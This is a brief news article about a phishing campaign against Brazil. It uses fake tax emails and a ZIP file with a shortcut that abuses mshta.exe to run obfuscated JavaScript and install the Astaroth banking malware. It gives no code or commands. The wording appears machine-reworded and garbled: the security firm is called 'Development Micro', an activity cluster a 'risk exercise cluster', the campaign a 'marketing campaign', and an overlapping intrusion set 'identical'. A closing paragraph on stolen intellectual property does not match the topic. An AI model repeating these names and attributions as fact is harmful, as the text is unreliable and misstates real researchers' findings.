A newly uncovered spear-phishing campaign targeting Brazil has been detected, employing malicious tactics to bypass security safeguards and deliver the notorious Astaroth (also known as Guildma) banking malware through the clever use of obfuscated JavaScript.
“The spear-phishing marketing campaign’s pervasive impact has targeted multiple sectors, with manufacturing firms, retail companies, and government agencies being among the most severely affected,” according to Development Micro’s latest assessment.
“Scammers craft deceitful emails masquerading as official tax documents, exploiting the pressure of individual income tax deadlines to coax victims into installing harmful software.”
The cybersecurity firm is monitoring a risk exercise cluster identified as “Water Makara”. Google’s TAG has attributed the codename to a threat actor delivering malicious software to Brazilian users, identifying a identical intrusion set.
The campaigns, while distinct, exhibit a shared trait: they initiate by dispatching phishing emails posing as official entities like Receita Federal, with the objective of deceiving recipients into downloading a ZIP archive attachment disguised as earnings tax documentation.
Inside the perilous ZIP file lies a Windows shortcut (LNK) that exploits mshta.exe, a legitimate utility designed to execute HTML Application files, run obfuscated JavaScript code, and establish connections to a command-and-control (C2) server.
“While previously thought to be a relic of the past, the resurgence and ongoing development of the malware pose a persistent threat,” the researchers noted.
Stolen intellectual property has far-reaching consequences, including erosion of consumer trust, substantial regulatory penalties, and increased costs resulting from enterprise disruptions and downtime, as well as the added burden of restoration and remediation efforts.
To effectively counteract the risks associated with these attacks, implementing robust password protocols, utilizing multi-factor authentication, maintaining security settings and software up-to-date, and adhering to the principle of least privilege are advisable measures.